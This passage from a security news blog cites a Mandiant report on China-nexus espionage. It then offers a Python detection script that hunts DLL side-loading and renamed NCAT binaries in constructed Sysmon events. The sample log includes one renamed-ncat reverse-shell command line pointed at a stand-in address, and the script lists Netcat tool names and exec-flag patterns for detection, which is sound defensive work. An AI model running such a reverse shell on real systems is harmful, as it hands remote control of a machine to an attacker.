Tomcik, Ryan, John Wolfram, Tommy Dacanay and Geoff Ackerman, Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia, blog post, 28 November 2022. Available online at https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia.
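Mandiant's YARA rules and IOCs are the authoritative detections for this campaign; the behavioural hunts below are an added example, not the report's, covering two pieces of the tradecraft described above: a signed executable side-loading an unsigned DLL from its own folder, and a renamed NCAT binary launched with the exec flag that turns it into a reverse shell. Events are constructed in a JSON-per-line shape following Sysmon Event ID 7 (ImageLoad) and Event ID 1 (ProcessCreate); the DLL name, paths and the 203.0.113.10 address are sample data, not indicators from the report, and the rule assumes the renamed binary kept the version resource that names it as ncat.exe.

```python
"""Two hunts over constructed Sysmon-style events: an unsigned DLL loaded
from the same user-writable folder as its host executable (side-loading),
and a process whose version resource says it is NCAT while its file name
says otherwise (renamed NCAT), escalated when the exec flag is present.
Event shapes follow Sysmon Event ID 7 (ImageLoad) and Event ID 1 (ProcessCreate)."""
import json
import ntpath
import re
from typing import Optional

# Locations where signed vendor software normally lives; an unsigned DLL beside
# an executable outside these is the side-loading signal (assumption).
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# OriginalFileName values under which Netcat-family tools ship (assumption: the
# renamed binary kept its version resource; if it was stripped, pivot to Hashes).
NETCAT_NAMES = {"ncat.exe", "nc.exe", "nc64.exe", "netcat.exe"}

# Ncat's options that attach a program to the connection (-e/--exec,
# -c/--sh-exec); matching them on the command line is a heuristic only.
EXEC_FLAG_RE = re.compile(r"(?:^|\s)(?:-e|--exec|-c|--sh-exec)\s", re.IGNORECASE)

# Constructed sample: a side-load from a removable drive, a normal system DLL
# load, a renamed NCAT reverse shell, a legitimate svchost, and a harmless rename.
SAMPLE_LOG = r"""
{"EventID": 7, "Image": "E:\\Docs\\Update.exe", "ImageLoaded": "E:\\Docs\\version.dll", "Signed": "false", "SignatureStatus": "Unavailable"}
{"EventID": 7, "Image": "C:\\Program Files\\Vendor\\Tool.exe", "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"}
{"EventID": 1, "Image": "C:\\ProgramData\\Helper\\svchost.exe", "OriginalFileName": "ncat.exe", "CommandLine": "svchost.exe 203.0.113.10 443 -e cmd.exe", "ParentImage": "E:\\Docs\\Update.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "OriginalFileName": "svchost.exe", "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs", "ParentImage": "C:\\Windows\\System32\\services.exe"}
{"EventID": 1, "Image": "C:\\Users\\bob\\Downloads\\7z_old.exe", "OriginalFileName": "7z.exe", "CommandLine": "7z_old.exe x archive.7z", "ParentImage": "C:\\Windows\\explorer.exe"}
"""


def parse_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def under_system_dir(path: str) -> bool:
    p = path.lower()
    return any(p.startswith(d) for d in SYSTEM_DIRS)


def hunt_sideload(ev: dict) -> Optional[dict]:
    """Event 7: unsigned module loaded from the host executable's own folder,
    outside the system and program directories."""
    loader, module = ev["Image"], ev["ImageLoaded"]
    same_dir = ntpath.dirname(loader).lower() == ntpath.dirname(module).lower()
    unsigned = str(ev.get("Signed", "")).lower() != "true"
    if same_dir and unsigned and not under_system_dir(module):
        return {"rule": "dll-sideload", "severity": "medium",
                "image": loader, "detail": f"loaded unsigned {module}"}
    return None


def hunt_renamed(ev: dict) -> Optional[dict]:
    """Event 1: file name disagrees with the OriginalFileName in the version
    resource; escalate when the resource names a Netcat-family tool."""
    name = ntpath.basename(ev["Image"]).lower()
    orig = str(ev.get("OriginalFileName", "")).lower()
    if not orig or orig == name:
        return None
    hit = {"rule": "renamed-binary", "severity": "low",
           "image": ev["Image"], "detail": f"OriginalFileName={orig}"}
    if orig in NETCAT_NAMES:
        hit["rule"], hit["severity"] = "renamed-netcat", "high"
        if EXEC_FLAG_RE.search(ev.get("CommandLine", "")):
            hit["detail"] += "; exec flag present (reverse shell)"
    return hit


HUNTS = {7: hunt_sideload, 1: hunt_renamed}


def hunt(events: list[dict]) -> list[dict]:
    hits = []
    for ev in events:
        rule = HUNTS.get(ev.get("EventID"))
        if rule is not None:
            hit = rule(ev)
            if hit is not None:
                hits.append(hit)
    return hits
```

One caveat on the side-load rule: Event 7's Signed and Signature fields describe ImageLoaded, not the loading Image, so the "legitimately-signed host" half of the pattern has to be confirmed separately (a hash lookup on the loader, or its own image-load record). The rename rule deliberately rates a bare name mismatch as low, since users rename downloads all the time; it is the combination with a Netcat version resource and an exec flag that is worth paging someone for.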


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
